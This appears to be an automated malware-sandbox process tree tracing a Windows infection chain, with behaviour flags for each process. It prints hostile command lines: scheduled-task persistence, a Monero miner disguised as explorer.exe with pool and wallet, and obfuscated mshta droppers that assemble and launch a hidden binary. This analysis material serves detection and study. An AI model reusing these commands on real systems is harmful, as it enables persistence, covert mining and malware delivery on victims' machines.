                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                              PID:868
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri103a7805577.exe
                                                                                                                                                                                                                                                                                                                                                Fri103a7805577.exe
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                PID:5004
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7752
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7268
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                          PID:5768
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                            PID:9192
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                          PID:7464
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                              PID:8836
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                PID:7888
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                PID:7640
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6636
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5568
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4160956.scr
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4160956.scr" /S
                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:3748
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6063150.scr
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6063150.scr" /S
                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                    PID:2516
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1903531.scr
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1903531.scr" /S
                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                    PID:8808
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3353340.scr
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3353340.scr" /S
                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                    PID:7452
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1424
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\7794210.scr
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\7794210.scr" /S
                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1008
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\inst001.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\inst001.exe"
                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3176
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:4560
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 236
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                            PID:9044
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"
                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                          PID:5700
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 364
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                            PID:5868
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 596
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                            PID:9128
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 616
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                            PID:8860
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 644
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                            PID:5152
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 720
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                            PID:7228
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 780
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                            PID:4852
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:7332
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 604
                                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                              PID:1540
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6456
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                PID:9144
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6848
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5092
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:8872
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                          taskkill -f /Im "sfx_123_206.exe"
                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                          PID:8672
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
                                                                                                                                                                                                                                                                                                                                                                                          ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8728
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:5732
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
                                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7752
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )
                                                                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5236
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2956
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
                                                                                                                                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:5316
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1324
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                                                                                                                                                                              control ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:9136
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4264
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:13864
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:13984
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2500
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-4NM9R.tmp\setup_2.tmp
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-4NM9R.tmp\setup_2.tmp" /SL5="$105B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6628
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:8800
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-1UOJ8.tmp\setup_2.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-1UOJ8.tmp\setup_2.tmp" /SL5="$10634,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                PID:9172
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2C8RL.tmp\postback.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2C8RL.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:8208
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:8520
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4500
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10d184202996a0d7f.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Fri10d184202996a0d7f.exe
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                              PID:4356
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri105268dda3.exe
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1112
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri105268dda3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                Fri105268dda3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4628
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 244
                                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:912
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone
                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4760
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10acd1e0a9e6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Fri10acd1e0a9e6.exe /mixone
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5204
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 244
                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5736
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4140
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4512
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2380
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.2
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                PID:3120
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10720d229511df563.exe
                                                                                                                                                                                                                                                                                                                                                                                                                Fri10720d229511df563.exe
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
